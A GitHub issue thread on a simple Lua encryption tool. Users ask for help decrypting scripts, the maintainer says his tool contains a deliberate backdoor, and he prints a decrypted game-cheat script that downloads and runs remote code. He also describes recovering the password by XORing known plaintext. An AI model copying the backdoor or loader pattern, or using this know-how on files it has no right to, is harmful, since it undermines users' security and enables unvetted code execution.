### ISSUE TITLE
need help to decrypt a lua file

### ISSUE THREAD

**Issue by linux21123** [ganlvtech/lua-simple-encrypt#30]
A friend has encrypt my file on my server and hes now away and he dont want give me the shit password i need a decrypter or anything like that please

**Comment by ganlvtech** [comment]
Actually, I could decrypt it. There is a piece of backdoor in my code. I could get the decrypted content.

If it's OK for you to let me examine the decrypted content legal or not. You can paste the file under this issue and tell some detail about the content.

**Comment by Jean132309** [comment]
[dcheroica5.zip](https://github.com/ganlvtech/lua-simple-encrypt/files/9084928/dcheroica5.zip)
por favor ayúdame a descifrar este script. quiero editarlo, por eso necesito descifrarlo
el men que lo actualizaba se fue de Youtube :"

**Comment by ganlvtech** [comment]
> [dcheroica5.zip](https://github.com/ganlvtech/lua-simple-encrypt/files/9084928/dcheroica5.zip)
@Jean132309

The password is a 14 bytes length IP address.

The original code just like this.

```lua
-------------------------------------------------------------------------
gg.alert('⚫DRAGON CITY HACK⚫\n❗Save Menu❗ 🐞Fixed Bugs🐛\n☑working☑ ⭐Star 5 Fixed⭐ New\n☑Goals☑ new\n🔵2021/8/4🔵\nℹv5.9.3 Updateℹ\n☑Script Fixed New☑\n')
-------------------------------------------------------------------------
TG =
gg.makeRequest("https://sociok.com/*********************************").content
if not TG then
else
pcall(load(TG))
end
```

Notice, It's a simple XOR encrypt. Telling you the original code, you could get the password by simple XOR original code and encrypted bytes.

I won't tell you the password directly.
